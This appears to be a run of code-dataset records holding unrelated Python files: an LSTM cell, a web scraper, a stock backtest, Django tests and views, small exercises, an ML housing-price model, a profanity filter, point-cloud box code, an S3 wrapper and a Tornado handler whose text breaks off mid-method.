* self.output_size, \n initializer=self._initializer)\n concat = inputs + projected_h\n i, j, o = tf.split(concat, num_or_size_splits=3, axis=1)\n i = tf.sigmoid(i)\n new_c = (1 - i) * c + i * tf.tanh(j)\n new_h = tf.tanh(new_c) * tf.sigmoid(o)\n new_state = tf.contrib.rnn.LSTMStateTuple(new_c, new_h)\n return new_h, new_state\n\n def _orthonormal_initializer(self, scale=1.0):\n def _initializer(shape, dtype=tf.float32, partition_info=None):\n M1 = np.random.randn(shape[0], shape[0]).astype(np.float32)\n M2 = np.random.randn(shape[1], shape[1]).astype(np.float32)\n Q1, R1 = np.linalg.qr(M1)\n Q2, R2 = np.linalg.qr(M2)\n Q1 = Q1 * np.sign(np.diag(R1))\n Q2 = Q2 * np.sign(np.diag(R2))\n n_min = min(shape[0], shape[1])\n params = np.dot(Q1[:, :n_min], Q2[:n_min, :]) * scale\n return params\n return _initializer\n\n def _block_orthonormal_initializer(self, output_sizes):\n def _initializer(shape, dtype=np.float32, partition_info=None):\n assert len(shape) == 2\n assert sum(output_sizes) == shape[1]\n initializer = self._orthonormal_initializer()\n params = np.concatenate([initializer([shape[0], o], dtype, partition_info) for o in output_sizes], 1)\n return params\n return _initializer\n","sub_path":"core/seq2seq/rnn_cell.py","file_name":"rnn_cell.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332546536","text":"import bs4 as bs\nimport urllib\n\nclass Perk:\n icon = ''\n name = ''\n maxRank = ''\n\n\nsource = urllib.urlopen('http://runescape.wikia.com/wiki/Perks').read();\n\nsoup = bs.BeautifulSoup(source, 'lxml')\n\ntables = soup.find_all('table', class_='wikitable')\n\nperkTable = tables[1]\n\nperkRows = perkTable.find_all('tr')\n\nfor row in perkRows:\n perkColumns = row.find_all('td')\n\n if len(perkColumns) != 0:\n perk = Perk()\n perk.icon = perkColumns[0].img['src']\n perk.name = perkColumns[1].text.strip()\n perk.maxRank = perkColumns[2].text.strip()\n\n print(perk.name, perk.maxRank)","sub_path":"Python/Runescape/perksTable.py","file_name":"perksTable.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613820809","text":"\n# ######################################################################################################################\n\"\"\"\n绩效回测V0:\n 根据真实持股数量计算组合及指数收益率,组合及指数买入数量一致\n 个股投入固定金额,持仓不调整\n\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport rqdatac as rq\nfrom rqdatac import *\n\nrq.init()\n\n# 参数\ninputPath = \"E:/中泰证券/策略/潜伏业绩预增策略/结果/\"\noutputPath = \"E:/中泰证券/策略/潜伏业绩预增策略/权重无调整/\"\nif not os.path.exists(outputPath):\n os.makedirs(outputPath)\n print(outputPath + '创建成功')\n\nstart_date = '2010-01-01'\nend_date = '2019-10-31'\n\nunit_amount = 5e5\ntax_cost = 0.001\ntran_cost = 0.0015\nindex_code = '000905.XSHG'\n\n\ndef getEveryDay(begin_date,end_date):\n # 前闭后闭\n date_list = []\n begin_date = datetime.datetime.strptime(begin_date, \"%Y-%m-%d\")\n end_date = datetime.datetime.strptime(end_date, \"%Y-%m-%d\")\n while begin_date <= end_date:\n date_str = begin_date.strftime(\"%Y-%m-%d\")\n date_list.append(date_str)\n begin_date += datetime.timedelta(days=1)\n return date_list\n\n\n# 交易日列表\nlist_trading = get_trading_dates(start_date=start_date, end_date=end_date)\nlist_date = getEveryDay(start_date, end_date)\n\n# 数据导入\ndf_buy_sell = pd.read_csv(inputPath + \"汇总个股买卖时点.csv\", index_col=0, engine='python')\ndf_buy_sell.sort_values(by='buy_date', axis=0, ascending=True, inplace=True)\ndf_buy_sell = df_buy_sell.reset_index(drop=True)\n\n# 剔除停牌及建仓日涨跌停个股\nlist_suspended_index = pd.DataFrame(index=df_buy_sell.index, columns=['index'])\nfor ind in df_buy_sell.index:\n ind_code = df_buy_sell.loc[ind, 'code']\n ind_date = df_buy_sell.loc[ind, 'buy_date']\n try:\n suspended_index = rq.is_suspended(ind_code, start_date=ind_date, end_date=ind_date)\n except:\n list_suspended_index.loc[ind, 'index'] = True\n else:\n if suspended_index is None:\n list_suspended_index.loc[ind, 'index'] = True\n else:\n list_suspended_index.loc[ind, 'index'] = suspended_index.loc[ind_date, ind_code]\n\nlist_limit_index = pd.DataFrame(index=df_buy_sell.index, columns=['index'])\nfor ind in df_buy_sell.index:\n ind_code = df_buy_sell.loc[ind, 'code']\n ind_date = df_buy_sell.loc[ind, 'buy_date']\n\n stocks_price = rq.get_price(ind_code, start_date=ind_date, end_date=ind_date, frequency='1d',\n fields=['open', 'limit_up', 'limit_down'], adjust_type='pre',\n skip_suspended=False, market='cn')\n\n if stocks_price is not None:\n if stocks_price.loc[ind_date, 'open'] == stocks_price.loc[ind_date, 'limit_up'] or \\\n stocks_price.loc[ind_date, 'open'] == stocks_price.loc[ind_date, 'limit_down']:\n list_limit_index.loc[ind, 'index'] = True\n else:\n list_limit_index.loc[ind, 'index'] = False\n else:\n list_limit_index.loc[ind, 'index'] = True\n\nlist_filter_index = list_suspended_index + list_limit_index\nstocks_list = list_filter_index[list_filter_index.values == False].index.tolist()\ndf_buy_sell = df_buy_sell.loc[stocks_list]\n\n# 股票列表\nlist_code = df_buy_sell['code'].unique()\nlist_code.sort()\n\n# 取行情数据\nprice_df = get_price(list_code, start_date=start_date, end_date=end_date, frequency='1d',\n fields=['open'], adjust_type='pre', skip_suspended=False, market='cn')\nprice_df = price_df.loc[:, list_code]\nprice_index = get_price(index_code, start_date=start_date, end_date=end_date, frequency='1d',\n fields=['open'], adjust_type='pre', skip_suspended=False, market='cn')\n\n# 收益率计算\ncash_port = 0\ncash_index = 0\nyear_pre = '2009'\nholding_pre = pd.Series(data=np.zeros(len(list_code)), index=list_code)\namount_pre = pd.Series(data=np.zeros(len(list_code)), index=list_code)\nindex_pre = pd.Series(data=np.zeros(len(list_code)), index=list_code)\nratio_df = pd.DataFrame(index=list_date, columns=['daily_ratio', 'index_ratio', 'daily_profit', 'index_profit',\n 'holding_num', 'buy_num', 'sell_num', 'cash_port'])\n\nfor date_str in list_date:\n date_datetime = datetime.datetime.strptime(date_str, \"%Y-%m-%d\")\n date = datetime.date(date_datetime.year, date_datetime.month, date_datetime.day)\n year_str = date_str[:4]\n\n if date not in list_trading[:-1]:\n if year_str == year_pre:\n holding_daily = holding_pre.copy()\n profit_daily = 0\n profit_index = 0\n else:\n holding_daily = pd.Series(data=np.zeros(len(list_code)), index=list_code)\n profit_daily = 0\n profit_index = 0\n else:\n date_post = list_trading[list_trading.index(date) + 1]\n\n holding_df = df_buy_sell[(df_buy_sell['buy_date'] <= date_str) & (df_buy_sell['sell_date'] > date_str)]\n holding_code = holding_df['code'].tolist()\n holding_daily = pd.Series(data=np.zeros(len(list_code)), index=list_code)\n holding_daily[holding_code] = 1\n\n # 日收益率\n rate_open_to_open = price_df.loc[date_post] / price_df.loc[date] - 1\n rate_index = price_index.loc[date_post] / price_index.loc[date] - 1\n rate_open_to_open = rate_open_to_open.fillna(0)\n\n # 交易信号\n series_buy = holding_daily - holding_pre\n series_buy[series_buy < 0] = 0\n series_sell = holding_daily - holding_pre\n series_sell[series_sell > 0] = 0\n\n # 组合当日权益\n cost_buy = series_buy * tran_cost * unit_amount\n cost_sell = -(series_sell * (tran_cost + tax_cost) * amount_pre)\n\n amount_pre[series_buy == 1] = unit_amount\n amount_daily = amount_pre * rate_open_to_open + amount_pre\n amount_daily = amount_daily - cost_buy - cost_sell\n amount_daily[series_sell == -1] = 0\n\n profit_daily = amount_pre * rate_open_to_open\n profit_daily[series_sell == -1] = 0\n profit_daily = profit_daily - cost_buy - cost_sell\n\n # 指数当日权益\n cost_buy_index = series_buy * tran_cost * unit_amount\n cost_sell_index = -series_sell * (tran_cost + tax_cost) * index_pre\n\n index_pre[series_buy == 1] = unit_amount\n index_daily = index_pre * rate_index + index_pre\n index_daily = index_daily - cost_buy_index - cost_sell_index\n index_daily[series_sell == -1] = 0\n\n profit_index = index_pre * rate_index\n profit_index[series_sell == -1] = 0\n profit_index = profit_index - cost_buy_index - cost_sell_index\n\n amount_pre = amount_daily.copy()\n index_pre = index_daily.copy()\n\n if any(np.isnan(amount_daily)):\n print(date)\n break\n\n # 资金占用\n if year_str == year_pre:\n cash_port = np.nansum(holding_daily) * unit_amount\n else:\n cash_port = 0\n\n # 指标计算\n ratio_df.loc[date_str, 'holding_num'] = np.nansum(holding_daily)\n ratio_df.loc[date_str, 'buy_num'] = ((holding_daily != 0) & (holding_pre == 0)).sum()\n ratio_df.loc[date_str, 'sell_num'] = ((holding_daily == 0) & (holding_pre != 0)).sum()\n ratio_df.loc[date_str, 'daily_profit'] = np.nansum(profit_daily)\n ratio_df.loc[date_str, 'index_profit'] = np.nansum(profit_index)\n ratio_df.loc[date_str, 'cash_port'] = cash_port\n\n holding_pre = holding_daily.copy()\n year_pre = year_str\n\n# 收益率计算\nyear_index = [date_str[:4] for date_str in list_date]\nratio_df['year_index'] = year_index\n\nunique_year_index = list(set(year_index))\nunique_year_index.sort()\n\nfor year_ind in unique_year_index:\n ratio_df['daily_ratio'][ratio_df['year_index'] == year_ind] = \\\n ratio_df['daily_profit'][ratio_df['year_index'] == year_ind] / \\\n sum(ratio_df['cash_port'][ratio_df['year_index'] == year_ind]) * 365\n\n ratio_df['index_ratio'][ratio_df['year_index'] == year_ind] = \\\n ratio_df['index_profit'][ratio_df['year_index'] == year_ind] / \\\n sum(ratio_df['cash_port'][ratio_df['year_index'] == year_ind]) * 365\n\n# 权益计算\nequity_df = pd.DataFrame(index=list_date, columns=['daily_equity', 'index_equity', 'excess_equity',\n 'cum_profit', 'index_cum_profit', 'excess_profit'])\n\nequity_df.loc[:, 'daily_equity'] = (ratio_df.loc[:, 'daily_ratio'] + 1).cumprod()\nequity_df.loc[:, 'index_equity'] = (ratio_df.loc[:, 'index_ratio'] + 1).cumprod()\nequity_df.loc[:, 'excess_equity'] = (ratio_df.loc[:, 'daily_ratio'] - ratio_df.loc[:, 'index_ratio'] + 1).cumprod()\nequity_df.loc[:, 'cum_profit'] = ratio_df.loc[:, 'daily_profit'].cumsum()\nequity_df.loc[:, 'index_cum_profit'] = ratio_df.loc[:, 'index_profit'].cumsum()\nequity_df.loc[:, 'excess_profit'] = (ratio_df.loc[:, 'daily_profit'] - ratio_df.loc[:, 'index_profit']).cumsum()\n\n# 数据导出\nratio_df.to_csv(outputPath + \"策略收益率换手率.csv\")\nequity_df.to_csv(outputPath + \"策略动态权益.csv\")\n\n# ######################################################################################################################\n","sub_path":"code/back_trading_amount_v0.py","file_name":"back_trading_amount_v0.py","file_ext":"py","file_size_in_byte":9182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"250533187","text":"import csv\n\nimport io\n\nfrom rest_framework.reverse import reverse\n\nfrom data_lake.test.test_hawk import hawk_auth_sender\n\nfrom django.test import (\n TestCase,\n override_settings,\n)\n\nfrom rest_framework.test import APIClient\n\n\nclass DataLakeTesting(TestCase):\n @override_settings(\n HAWK_INCOMING_ACCESS_KEY=\"some-id\", HAWK_INCOMING_SECRET_KEY=\"some-secret\",\n )\n def get_data(self):\n test_url = f\"http://testserver{reverse(self.url_name)}\"\n\n sender = hawk_auth_sender(url=test_url)\n return APIClient().get(\n test_url,\n content_type=\"\",\n HTTP_AUTHORIZATION=sender.request_header,\n HTTP_X_FORWARDED_FOR=\"1.2.3.4, 123.123.123.123\",\n )\n\n def check_data(self):\n response = self.get_data()\n assert response[\"Content-Type\"] == \"text/csv\"\n content = response.content.decode(\"utf-8\")\n data = csv.reader(io.StringIO(content))\n rows = list(data)\n assert len(rows[0]) == self.row_lenght\n current_row = rows[1]\n archive_row = rows[2]\n assert str(current_row[self.code_position]) == str(self.current_code)\n\n # Check the archived value\n assert str(archive_row[self.code_position]) == str(self.archived_code)\n","sub_path":"data_lake/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393356089","text":"class Solution(object):\n def distributeCandies(self, candies):\n \"\"\"\n :type candies: List[int]\n :rtype: int\n \"\"\"\n unique = len(set(candies))\n half_len = len(candies) / 2\n \n if unique <= half_len:\n return unique\n \n else:\n return half_len\n \n ","sub_path":"Python/Easy/575DistributeCandies.py","file_name":"575DistributeCandies.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165672758","text":"#Iowa housing price prediction using decision trees\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error\n\n#Generating a dataframe of the Iowa dataset obtained from the government\niowa_file_path = '../input/train.csv'\niowa_training_data = pd.read_csv(iowa_file_path)\nprint(iowa_training_data.columns)\nprint(\"\\n\")\n\n#Defining the label/target variable\ny = iowa_training_data.SalePrice\nprint(y.head(5))\nprint(\"\\n\")\n\n#Defining the features/predictors\niowa_predictors = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\nx = iowa_training_data[iowa_predictors]\nprint(x.describe())\nprint(\"\\n\")\n\n#Defining the prediction model and fitting the model on the training dataset\ntrain_x, val_x, train_y, val_y = train_test_split(x, y, random_state = 0)\niowa_model = DecisionTreeRegressor()\niowa_model.fit(train_x, train_y)\n\n#Initiating the prediction function for forecasting prices for the validation dataset comprising information on Iowa's housing\nprint(\"Making predictions for houses in Iowa, on their prices:\")\nprint(val_x)\nprint(\"The values are:\")\nval_predictions = iowa_model.predict(val_x)\nprint(val_predictions)\nprint(\"\\n\")\n\n#Calculating the mean absolute error\nprint(\"The mean absolute error is:\", mean_absolute_error(val_y, val_predictions))\n\n#Utility function for evaluating the model and finding the maximum leaf nodes the model must have to attain the least MAE (mean absolute error)\ndef get_mae(max_leaf_nodes, trainX, valX, trainY, valY):\n model = DecisionTreeRegressor(max_leaf_nodes = max_leaf_nodes, random_state = 0)\n model.fit(trainX, trainY)\n pred_val = model.predict(valX)\n mae = mean_absolute_error(valY, pred_val)\n return(mae)\n\n#Comparing the models with differing values of maximum leaf nodes, by calling the utility function\nfor max_leaf_nodes in [5, 50, 500, 5000]:\n mae_obtained = get_mae(max_leaf_nodes, train_x, val_x, train_y, val_y)\n print(\"Max Leaf Nodes: %d \\t\\t Mean Absolute Error: %d\" %(max_leaf_nodes, mae_obtained))\n \n#Observation: With 50 leaf nodes, the mean absolute error is the least with the value 27825!\"\n#--------------------------------------------------------------------------------------------------\n#Using the Random Forest Model to predict the housing prices in Iowa\n\n#forest_model = RandomForestRegressor()\n#forest_model.fit(train_x, train_y)\n#iowa_predictions = forest_model.predict(val_x)\n#print(mean_absolute_error(val_y, iowa_predictions))\n \n#Observation: Random forest model gives a lower mean absolute error of ~24200, than the decision tree model","sub_path":"Predictive Analysis Of Housing Price Trends In Iowa (USA) Using Decision Trees.py","file_name":"Predictive Analysis Of Housing Price Trends In Iowa (USA) Using Decision Trees.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544652072","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tkinter as tk \nfrom PIL import ImageTk,Image, ImageDraw\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nfrom os.path import splitext\nimport numpy as np \n\ngui = tk.Tk()\n\ngui.title('AIP 60847047S')\ngui.geometry('1024x640')\n\n\ndef Input(): \n global PILFile\n filename = askopenfilename()\n t1 = splitext(filename)[-1]\n t2 = t1[1:]\n if t2 in {'jpg','BMP','ppm'}:\n PILFile = Image.open(filename).convert('F')\n width, height = PILFile.size\n lb.config(text = \"讀入 \"+ str(width) + \"X\" + str(height) + \" \" + t2 + \" 檔\")\n PILFile = PILFile.resize((390, 480), Image.ANTIALIAS) \n create_img(PILFile)\n \n else:\n lb.config(text = \"不支援的檔案格式\")\n \n\ndef create_img(PILFile):\n global pilfile, qq\n pilfile = ImageTk.PhotoImage(PILFile)\n qq.configure(image = pilfile)\n \n \ndef hist(PILFile):\n global _Image, qaq, avatar\n im_array = np.array(PILFile)\n m_array = np.ndarray.flatten(im_array)\n m_array = np.round(m_array)\n uniqueValues, occurCount = np.unique(m_array, return_counts=True)\n\n width = 400\n height = 400\n avatar = Image.new(\"RGB\", (width, height), (255,255,255))\n drawAvatar = ImageDraw.Draw(avatar)\n\n for i, j in zip(uniqueValues, occurCount):\n j = round(j*400/max(occurCount))\n drawAvatar.rectangle([(0, i),(j, i)], fill = 'Blue')\n del drawAvatar\n avatar = avatar.rotate(90)\n _Image = ImageTk.PhotoImage(avatar)\n qaq.configure(image = _Image)\n\n \ndef save(img):\n filename = asksaveasfilename(title = \"Select file\",filetypes = ([(\"PNG\", \"*.png\"),(\"JPEG\", \"*.jpg\"),(\"BMP\", \"*.BMP\"),(\"PPM\", \"*.ppm\"),(\"All files\", \"*\")]), defaultextension = \"*.*\")\n print(filename)\n if filename:\n img.save(filename)\n \nframe1 = tk.Frame(gui, width= 450, height= 580)\nqq = tk.Label(frame1)\nqq.pack()\nframe2 = tk.Frame(gui, width= 400, height = 400)\nqaq = tk.Label(frame2)\nqaq.pack()\nframe1.place(x = 0, y = 100)\nframe2.place(x = 670, y = 180)\n\n\n\nlb = tk.Label(gui, text = '', font = 30)\nlb.place(x = 450, y = 50)\nbtn1 = tk.Button(gui, text = \"讀入檔案\", command = Input, font = 80, height = 3, width = 8)\nbtn1.place(x = 0, y = 0)\nbtn2 = tk.Button(gui, text = \"儲存直方圖\", command = lambda : save(avatar), font = 80, height = 3, width = 10)\nbtn2.place(x = 164, y = 0) \nl1 = tk.Label(gui, text = '輸入影像', width = 10,height = 3, font = 30).place(x = 180, y = 600)\nl2 = tk.Label(gui, text = '輸出影像', width = 10,height = 3, font = 30).place(x = 780, y = 600)\nbtn3 = tk.Button(gui, text = \"做直方圖\", command = lambda : hist(PILFile), font = 80, height = 3, width = 8)\nbtn3.place(x = 82, y = 0)\n\ngui.mainloop()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"HW2/HW2 60847047S.py","file_name":"HW2 60847047S.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269769472","text":"\"\"\" Crawley configuration file \"\"\"\n\n# Paths\n\nCRAWLEY_ROOT_DIR = \"crawley\"\n\n# Requests\n\nREQUEST_TIMEOUT = None #in seconds\nREQUEST_DELAY = 300 #in miliseconds\nREQUEST_DEVIATION = 300 #in miliseconds\n\nMOZILLA_USER_AGENT = \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30\"\n\n# Scrapers\n\nSIMILARITY_RATIO = 0.35\n\n","sub_path":"crawley/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572043752","text":"class NaiveFilter():\n\n def __init__(self): \n \n self.keywords = set([])\n\n\n def parse(self, path):\n\n for keyword in open(path, 'rb'):\n self.keywords.add(keyword.strip().decode('utf-8').lower())\n\n def filter(self, message, repl=\"*\"):\n \n message = str(message).lower()\n for kw in self.keywords:\n message = message.replace(kw, repl)\n return message\n\nif __name__ == \"__main__\":\n f = NaiveFilter()\n f.parse(\"keywords\")\n\n print (f.filter(\"弘扬正能量,从在宿舍说文明话坐起\"))\n # 结果:弘扬正能量,从在宿舍说文明话坐起\n print (f.filter(\"我他妈的\"))\n # 我*\n print (f.filter(\"我日\"))\n # *\n\n\n","sub_path":"Week1/Answer-xyn.py","file_name":"Answer-xyn.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448377678","text":"\n\npoint_indices = box_np_ops.nuscenes_points_in_rbbox(points, rbbox_lidar,annos['rotation_matrix'])\ngt_points = points[point_indices[:, i]]\n\n\n\ndef corner_to_surfaces_3d(corners):\n \"\"\"convert 3d box corners from corner function above\n to surfaces that normal vectors all direct to internal.\n\n Args:\n corners (float array, [N, 8, 3]): 3d box corners.\n Returns:\n surfaces (float array, [N, 6, 4, 3]):\n \"\"\"\n # box_corners: [N, 8, 3], must from corner functions in this module\n surfaces = np.array([\n [corners[:, 0], corners[:, 1], corners[:, 2], corners[:, 3]],\n [corners[:, 7], corners[:, 6], corners[:, 5], corners[:, 4]],\n [corners[:, 0], corners[:, 3], corners[:, 7], corners[:, 4]],\n [corners[:, 1], corners[:, 5], corners[:, 6], corners[:, 2]],\n [corners[:, 0], corners[:, 4], corners[:, 5], corners[:, 1]],\n [corners[:, 3], corners[:, 2], corners[:, 6], corners[:, 7]],\n ]).transpose([2, 0, 1, 3])\n return surfaces\n\ndef points_in_convex_polygon_3d_jit(points,\n polygon_surfaces,\n num_surfaces=None):\n \"\"\"check points is in 3d convex polygons.\n Args:\n points: [num_points, 3] array.\n polygon_surfaces: [num_polygon, max_num_surfaces,\n max_num_points_of_surface, 3]\n array. all surfaces' normal vector must direct to internal.\n max_num_points_of_surface must at least 3.\n num_surfaces: [num_polygon] array. indicate how many surfaces\n a polygon contain\n Returns:\n [num_points, num_polygon] bool array.\n \"\"\"\n max_num_surfaces, max_num_points_of_surface = polygon_surfaces.shape[1:3]\n num_points = points.shape[0]\n num_polygons = polygon_surfaces.shape[0]\n if num_surfaces is None:\n num_surfaces = np.full((num_polygons,), 9999999, dtype=np.int64)\n normal_vec, d = surface_equ_3d_jit(polygon_surfaces[:, :, :3, :])\n # normal_vec: [num_polygon, max_num_surfaces, 3]\n # d: [num_polygon, max_num_surfaces]\n ret = np.ones((num_points, num_polygons), dtype=np.bool_)\n sign = 0.0\n for i in range(num_points):\n for j in range(num_polygons):\n for k in range(max_num_surfaces):\n if k > num_surfaces[j]:\n break\n sign = points[i, 0] * normal_vec[j, k, 0] \\\n + points[i, 1] * normal_vec[j, k, 1] \\\n + points[i, 2] * normal_vec[j, k, 2] + d[j, k]\n if sign >= 0:\n ret[i, j] = False\n break\n return ret\n\ndef nuscenes_points_in_rbbox(points, rbbox,rotation_matrix):\n location = rbbox[:, :3]\n dimension = rbbox[:, 3:6]\n ry = rbbox[:, 6]\n iNumObj = ry.shape[0]\n corners_3d_list=[]\n for iIndex in range(iNumObj):\n w,l,h = dimension[iIndex,:]\n x_corners = l / 2 * np.array([1, 1, 1, 1, -1, -1, -1, -1])\n y_corners = w / 2 * np.array([1, -1, -1, 1, 1, -1, -1, 1])\n z_corners = h / 2 * np.array([1, 1, -1, -1, 1, 1, -1, -1])\n rot_mat = rotation_matrix[iIndex,:,:]\n corners = np.vstack((x_corners, y_corners, z_corners))\n corners = np.dot(rot_mat, corners)\n centre = location[iIndex,:]\n centre = np.expand_dims(centre, axis=1)\n rbboxes = centre # np.dot(box.orientation.rotation_matrix, centre)\n x, y, z = location[iIndex,:]\n corners[0, :] = corners[0, :] + x\n corners[1, :] = corners[1, :] + y\n corners[2, :] = corners[2, :] + z\n corners_3d = corners.T\n corners_3d = np.expand_dims(corners_3d, axis=0)\n corners_3d_list.append(corners_3d)\n\n corner_3d = corners_3d_list[0]\n for iIndex in range(iNumObj-1):\n array2 = corners_3d_list[iIndex+1]\n corner_3d = np.concatenate((corner_3d,array2),axis=0)\n surfaces = corner_to_surfaces_3d(corner_3d)\n indices = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)\n return indices","sub_path":"second/pytorch/mayank_play/lidar_bbox_on_nuscne_Data/creating_indeces_from_detection_object_pointcloud.py","file_name":"creating_indeces_from_detection_object_pointcloud.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374107445","text":"from django.shortcuts import render\n\ndef home(request):\n return render(request, \"home.html\")\n\ndef result(request):\n sentence = request.GET['sentence']\n\n wordList = sentence.split()\n\n wordDick = {}\n\n for word in wordList:\n if word in wordDick:\n wordDict[word] += 1\n else:\n wordDick[word] = 1\n\nreturn render(request, \"result.html\", {'fulltext': sentence, 'count':len(wordList), \"wordDick\":wordDict.items})","sub_path":"django/secondproject/wordCount/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"337737466","text":"def miarka(size):\n miara = \"\"\n for i in range(size):\n if i == 0:\n miara += \"|....|\"\n else:\n miara += \"....|\"\n liczby = \"\"\n for i in range(size + 1):\n if i == 0:\n liczby += str(i)\n else:\n liczby += str(i).rjust(5)\n wynik = miara + \"\\n\" + liczby\n return wynik\n\n\nprint(miarka(20))\n","sub_path":"3.5.py","file_name":"3.5.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416300461","text":"# coding: utf-8\n\n# Based on thumbor-community thumbor aws_s3 loader\n# Use of this source code is governed by the MIT license that can be\n# found in the LICENSE file.\n\nfrom boto3.session import Session\n\nclass Bucket(object):\n \"\"\"\n This handles all communication with AWS API\n \"\"\"\n _bucket = None\n _local_cache = dict()\n\n def __init__(self, bucket, region, endpoint, accessKeyId, secretAccessKey):\n \"\"\"\n Constructor\n :param string bucket: The bucket name\n :param string region: The AWS API region to use\n :param string accessKeyId: The AWS access key ID for accessing the bucket\n :param string secretAccessKey: The AWS secret access key for accessing the bucket\n :return: The created AWS client for the bucket \n \"\"\"\n self._bucket = bucket\n \n self._client = Session().client(\n service_name='s3',\n aws_access_key_id=accessKeyId,\n aws_secret_access_key=secretAccessKey,\n region_name=region,\n endpoint_url=endpoint\n )\n\n def get(self, path):\n \"\"\"\n Returns object at given path\n :param string path: Path or 'key' to retrieve AWS object\n \"\"\"\n\n response = self._client.get_object(Bucket=self._bucket, Key=path)\n\n return response['Body'].read()\n \n\n","sub_path":"remotecv_aws/bucket.py","file_name":"bucket.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570878730","text":"#!/usr/bin/env python\n# coding=UTF-8\n# Title: handler.py\n# Description: This file contains all tornado.web.RequestHandler classes used in this application\n# Author David Nellessen \n# Date: 12.01.15\n# Note: \n# ==============================================================================\n\n# Import modules\nfrom tornado import web, gen, escape\nfrom tornado.escape import utf8\nimport logging\nimport phonenumbers\nimport pygeoip\nfrom tornado.iostream import StreamClosedError\n\n\nclass BaseHandler(web.RequestHandler):\n \"\"\"\n A base handler providing localization features, phone number validation\n and formation as well as use of service limitation based on IP addresses.\n It also implements support for JSONP (for cross-domain requests).\n \"\"\"\n guess_country = True\n default_country = 'DE'\n\n def __init__(self, application, request, **kwargs):\n super(BaseHandler, self).__init__(application, request, **kwargs)\n self.counter = {}\n\n\n def write(self, chunk):\n \"\"\"\n Overwrites the default write method to support tornado.webJSONP.\n \"\"\"\n if self._finished:\n raise RuntimeError(\"Cannot write() after finish(). May be caused \"\n \"by using async operations without the \"\n \"@asynchronous decorator.\")\n if isinstance(chunk, dict):\n chunk = escape.json_encode(chunk)\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n callback = self.get_argument('callback', None)\n if callback:\n chunk = callback + '(' + chunk + ');'\n chunk = utf8(chunk)\n self._write_buffer.append(chunk)\n\n\n def get_browser_locale_code(self):\n \"\"\"\n Determines the user's locale from ``Accept-Language`` header.\n This is similar to tornado.web.get_browser_locale except it\n returns the code and not a Locale instance. Also this will return\n a result weather a translation for this language was loaded or not.\n\n See http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4\n \"\"\"\n if \"Accept-Language\" in self.request.headers:\n languages = self.request.headers[\"Accept-Language\"].split(\",\")\n locales = []\n for language in languages:\n parts = language.strip().split(\";\")\n if len(parts) > 1 and parts[1].startswith(\"q=\"):\n try:\n score = float(parts[1][2:])\n except (ValueError, TypeError):\n score = 0.0\n else:\n score = 1.0\n locales.append((parts[0], score))\n if locales:\n locales.sort(key=lambda pair: pair[1], reverse=True)\n logging.debug(locales)\n codes = [l[0] for l in locales]\n return codes[0]\n return self.__class__.default_country\n\n\n def get_user_country_by_ip(self):\n \"\"\"\n Determines the user's country by his IP-address. This will return\n the country code or None if not found.\n \"\"\"\n try:\n country = self.application.geo_ip.country_code_by_addr(\n self.request.remote_ip)\n except pygeoip.GeoIPError:\n try:\n country = self.application.geo_ipv6.country_code_by_addr(\n self.request.remote_ip)\n except pygeoip.GeoIPError:\n pass\n if not country:\n logging.warning('Could not locate country for ' + self.request.remote_ip)\n return None\n else:\n logging.debug('Determined country by IP address: ' + country)\n return country\n\n\n def parse_phonenumber(self, number):\n \"\"\"\n Validates and parses a phonenumber. It will return a\n phone number object or False if parsing failed.\n\n If the phone number is not given in full international notion the\n parameter the country will be guesses if the class attribute guess_country\n is True. Guessing will be done as follows:\n 1. If a query string parameter 'country' is given as a country code\n (i.e. 'US', 'DE', ...) it will be used.\n 2. If no parameter country is given the country will be determined by\n the remote IP address.\n 3. Otherwise the country determined by the request header\n Accept-Language will be used.\n 4. As a fall-back the classes default_country attribute will be used.\n \"\"\"\n try:\n return 